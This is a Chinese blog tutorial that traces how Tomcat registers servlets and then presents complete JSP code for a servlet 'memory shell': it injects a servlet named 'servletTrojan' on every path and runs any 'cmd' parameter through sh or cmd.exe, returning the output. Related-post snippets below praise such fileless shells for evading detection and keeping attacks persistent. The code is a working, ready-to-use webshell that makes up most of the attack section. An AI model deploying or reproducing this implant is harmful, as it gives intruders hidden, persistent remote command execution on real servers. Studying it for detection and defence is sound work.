『Java安全』Tomcat内存马_动态注册Servlet内存马

已于 2022-03-29 20:47:35 修改
阅读量2.6k 收藏 3
点赞数 1
分类专栏: # Java内存马基础 文章标签: java安全 servlet 内存马 容器安全 tomcat
于 2022-03-24 20:25:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xxy605/article/details/123716166
版权
本文详细解析了Servlet的启动调用流程,从StandardContext开始,包括注册servlet、处理过滤器和调用HttpServlet.service方法。同时,介绍了Servlet内存马的原理,通过动态注册恶意servlet并配置映射,实现远程命令执行。文章提供了完整的Java代码示例,展示了内存马的生成过程。
摘要由CSDN通过智能技术生成

文章目录

Servlet调用流程分析

1. StandardContext.startInternal注册servlet

启动后在startInternal调用了fireLifecycleEvent
在这里插入图片描述
然后来到ContextConfig.webConfig
在这里插入图片描述
接着来到configureContext,传入web.xml执行解析操作,按顺序解析Listener、Filter、Servlet
在这里插入图片描述
对于解析Servlet:首先配置wrapper

  1. 调用StandardContext.createWrapper为每个servlet1创建wrapper
  2. 配置LoadOnStartup启动顺序值
  3. 配置名称
    在这里插入图片描述
    4.配置类名
    在这里插入图片描述

然后将wrapper添加到StandardContext,调用的是addChild方法
在这里插入图片描述
最后调用addServletMapppingDecoded添加映射在这里插入图片描述

2. StandardContextValue.invoke获取wrapper

注册的wrapper是StandardWrapper类实例,然后调用StandardWrapper.invoke
在这里插入图片描述

3. StandardWrapperValue.invoke处理doFilter

然后获取StandardWrapper
在这里插入图片描述
首先处理filter
在这里插入图片描述

4. doFilter调用HttpServlet.service提供服务

最后doFilter会调用this.servlet.service
在这里插入图片描述
HttpServlet.service提供了多种方法
在这里插入图片描述

Servlet内存马

原理

模拟正常的注册流程,向StandardContext动态注册含有恶意servlet的Wrapper

  1. 获取context
  2. 生成恶意servlet
  3. 生成wrapper
  4. wrapper放入context
  5. 添加mapping映射

Ⅰ.获取context

和其他两种内存马一样

<%
	Field requestField = request.getClass().getDeclaredField("request");
    requestField.setAccessible(true);
    Request request1 = (Request) requestField.get(request);
    StandardContext standardContext = (StandardContext) request1.getContext();

Ⅱ.生成恶意servlet

重写service方法,当然重写doGet和doPost一样的

   HttpServlet servlet = new HttpServlet() {
        @Override
        protected void service(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
            if (request.getParameter("cmd") != null) {
                boolean isLinux = true;
                String osTyp = System.getProperty("os.name");
                if (osTyp != null && osTyp.toLowerCase().contains("win")) {
                    isLinux = false;
                }
                String[] cmds = isLinux ? new String[]{"sh", "-c", request.getParameter("cmd")} : new String[]{"cmd.exe", "/c", request.getParameter("cmd")};
                InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
                Scanner s = new Scanner(in).useDelimiter("\\A");
                String output = s.hasNext() ? s.next() : "";
                response.getWriter().write(output);
                response.getWriter().flush();
            }
        }
    };

Ⅲ. 生成wrapper并放入context

调用createWrapper方法生成,然后配置name、启动顺序、servlet和类,然后调用addChild加入context

	Wrapper wrapper = standardContext.createWrapper();
    wrapper.setName("servletTrojan");
    wrapper.setLoadOnStartup(1);
    wrapper.setServlet(servlet);
    wrapper.setServletClass(HttpServlet.class.getName());

	standardContext.addChild(wrapper);

Ⅳ. 配置映射

使用addServletMappingDecoded而不是addServletMapping

standardContext.addServletMappingDecoded("/*", "servletTrojan");

完整代码

<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="java.io.IOException" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.util.Scanner" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="org.apache.catalina.Wrapper" %>

<%
    Field requestField = request.getClass().getDeclaredField("request");
    requestField.setAccessible(true);
    Request request1 = (Request) requestField.get(request);
    StandardContext standardContext = (StandardContext) request1.getContext();

    HttpServlet servlet = new HttpServlet() {
        @Override
        protected void service(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
            if (request.getParameter("cmd") != null) {
                boolean isLinux = true;
                String osTyp = System.getProperty("os.name");
                if (osTyp != null && osTyp.toLowerCase().contains("win")) {
                    isLinux = false;
                }
                String[] cmds = isLinux ? new String[]{"sh", "-c", request.getParameter("cmd")} : new String[]{"cmd.exe", "/c", request.getParameter("cmd")};
                InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
                Scanner s = new Scanner(in).useDelimiter("\\A");
                String output = s.hasNext() ? s.next() : "";
                response.getWriter().write(output);
                response.getWriter().flush();
            }
        }
    };

    Wrapper wrapper = standardContext.createWrapper();
    wrapper.setName("servletTrojan");
    wrapper.setLoadOnStartup(1);
    wrapper.setServlet(servlet);
    wrapper.setServletClass(HttpServlet.class.getName());

    standardContext.addChild(wrapper);
    standardContext.addServletMappingDecoded("/*", "servletTrojan");

    out.println("inject done!");
    out.flush();
%>

参考引用

Servlet内存马

欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://blog.csdn.net/Xxy605/article/details/123716166
版权声明:本文为原创,转载时须注明出处及本声明

Ho1aAs
关注
专栏目录
Java Tomcat内存——Servlet内存
m0_61506558的博客
11-27 534
Java Servlet 是运行在 Web 服务器或应用服务器上的程序,它是作为来自 Web 浏览器或其他 HTTP 客户端的请求和 HTTP 服务器上的数据库或应用程序之间的中间层。使用 Servlet,您可以收集来自网页表单的用户输入,呈现来自数据库或者其他源的记录,还可以动态创建网页。Java Servlet 通常情况下与使用 CGI(Common Gateway Interface,公共网关接口)实现的程序可以达到异曲同工的效果
shiro 内存_Tomcat 内存检测
weixin_39637921的博客
12-22 1504
随着HW、攻防对抗的强度越来越高,各大厂商对于webshell的检测技术愈发成熟,对于攻击方来说,传统的文件落地webshell的生存空间越来越小,无文件webshell已经逐步成为新的研究趋势。三月底针对tomcat内存的检测写了一个demo,但由于对Maven打包理解不深,整个项目结构比较糟糕。国庆前偶然发现LandGrey师傅的copagent项目,在该项目基础上进行了重构,并于本文中记录...
Tomcat-Servlet内存
01-15 530
前面学习了 Listener/Filter 内存,今天来学习一下 Servlet 内存
Tomcat Servlet内存
老男孩的架构路
07-28 163
Tomcat服务器是一个免费的开放源代码的Web应用服务器,Tomcat是Apache软件基金会(ApacheSoftwareFoundation)的Jakarta项目中的一个核心项目,它早期的名称为catalina,后来由Apache、Sun和其他一些公司及个人共同开发而成,并更名为TomcatTomcat是应用(java)服务器,它只是一个servlet容器,是Apache的扩展,但它是独立运行的。从宏观上来看,Tomcat其实是Web服务器和Servlet容器的结合体。...
Servlet内存的学习
最新发布
a877558888的博客
08-14 773
Servlet内存编写
servlet动态注册
qq_26847293的博客
09-09 651
只能在webapp启动时进行注册. 在Servlet3.0中可以动态注册Servlet,Filter,Listener,在ServletContext对应注册API为: /** * 添加Servlet */ public ServletRegistration.Dynamic addServlet(String servletName, String clas
com.sysdeo.eclipse.tomcat_3.3.0.rar_Jsp/Servlet_Java_
08-11
【描述】"eclipse tomcat plug v33 - 最新eclipse tomcat插件助你轻松开发jsp网站" 指出,该插件是Eclipse Tomcat插件的第3.3.0版本,主要目的是帮助开发者高效地开发JSP(JavaServer Pages)和Servlet应用。...
tomcat-with-java_web.rar_TomcatJava Web_java web
09-21
Tomcat遵循Java ServletJavaServer Pages (JSP) 规范,提供了一个简单且高效的环境来运行Java Web应用。 Java Web,通常指的是使用Java语言开发的Web应用程序,它包括一系列技术,如Servlet、JSP、JavaServer ...
day13_tomcat_java_
09-30
总的来说,Java Web开发中,Tomcat的学习涵盖了服务器的安装、应用部署、Servlet与JSP编程、错误处理以及性能优化等多个方面。通过深入理解和实践,你将能够熟练地利用Tomcat搭建和管理Java Web应用。
学习记录541@Java代码启动Tomcat及手动注册servlet
教练我想学编程
03-14 359
创建maven项目并引入依赖 <dependency> <groupId>org.apache.tomcat.embed</groupId> <artifactId>tomcat-embed-core</artifactId> <version>10.0.8</version> </dependency> 代码TomcatT
S06-tomcatservlet内存1
08-03
S06-tomcatservlet内存1
tomcatservlet-api
05-28
java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包java运行tomcat需要的包
基于Servlet-API型JAVA内存(filter型、servlet型、listener型)
遇事不决冲冲冲
06-03 2443
常规的木实际写出落地后容易被检查出来,并且webshell被发现后也就导致我们的行动被发现,很容易造成木被查杀、利用漏洞被修复,使我们的攻击变得更加艰难,所以内存的出现与利用无疑是增强了隐蔽性,可以让我们的攻击更加稳定、持久Tomcat、filter、servlet、listener......
Servlet内存
angry_program的博客
07-08 2644
1. 何谓内存? 以Tomcat为例,内存主要利用了Tomcat的部分组件会在内存中长期驻留的特性,只要将我们的恶意组件注入其中,就可以一直生效,直到容器重启。 Java内存shell有很多种,大致分为: 1. 动态注册filter 2. 动态注册servlet 3. 动态注册listener 4. 基于Java agent拦截修改关键类字节码实现内存shell 该文主要研究Servlet内存的原理和实现。 2. 何为ServletTomcat 服务器是一个免费的开放源代
java Servlet内存
hongduilanjun的博客
03-26 3621
Servlet web.xml <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmln
Tomcat内存学习2:Servlet
weixin_43263451的博客
07-23 610
上一篇讲了filter型内存,而这次这个servlet内存也是大同小异,就是在内存中恶意创建一个servlet供攻击者使用必须搞懂servlet的加载机制(创建standwrapper,添加到standcontext中,加载standwrapper)在此加载机制基础上,设计出servlet内存poc。...
利用JSP动态注册Servlet
m0_63823719的博客
03-19 349
引入对应版本的tomcat-catalina包。新建一个JSP页面并写入以下内容。
Java安全Tomcat内存_动态注册Listener内存
Ho1aAs‘s Blog
03-24 1850
Java安全』反序列化- 文章目录前言Tomcat Servlet API Listener介绍ServletRequestListener介绍ServletRequestListener调用流程分析1. Request创建时2. Request销毁时Listener内存原理Ⅰ.获取contextⅡ. 生成恶意Listener获取ResponseⅢ. add添加listener完整代码参考引用完 前言 Tomcat Servlet API Listener介绍 Listener监听器用来监听对象创建、销
Java内存泄露诊断与Tomcat7实践
他的专业领域包括Tomcat内存泄露检测与预防技术的开发,负责了Tomcat 7.0.x版本的主要工作,如内存泄漏检测工具的实现、Servlet 3.0、JSP 2.2和EL 2.2的关键部分,以及安全页面的创建。在Apache Software Foundation...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值